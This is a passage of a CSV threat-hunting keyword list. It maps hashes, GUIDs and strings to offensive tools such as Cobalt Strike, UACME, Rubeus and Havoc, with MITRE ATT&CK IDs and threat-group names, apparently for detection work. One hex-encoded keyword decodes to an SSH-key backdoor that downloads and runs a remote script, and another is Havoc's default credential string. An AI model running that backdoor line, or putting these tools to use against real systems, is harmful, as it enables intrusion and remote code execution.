T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*516280565959*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5439CECD-3BB3-4807-B33F-E4C299B71CA2*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" 
+"*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*555AD0AC-1FDB-4016-8257-170A74CB2F55*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" 
+"*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","0","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*57A893C7-7527-4B55-B4E9-D644BBDA89D1*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5A403F3C-9136-4B67-A94E-02D3BCD3162D*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" 
+"*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","0","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" +"*5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in 
Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5dec1cfe7c0c2ec55c17fb44b43f7d14*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*5e98194a01c6b48fa582a6a9fcbb92d6*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
+"*5e98194a01c6b48fa582a6a9fcbb92d6*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
+"*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z"
+"*5spider:password1234*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" 
+"*60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z"
+"*6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*639EF517-FCFC-408E-9500-71F0DC0458DB*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel 
PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
+"*-64 -format=reflective-dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*6563686f2048656c6c6f204261636b646f6f72*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A"
+"*658C8B7F-3664-4A95-9572-A3E5871DFC06*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*66e0681a500c726ed52e5ea9423d2654*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD 
Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z"
+"*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z"
+"*6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
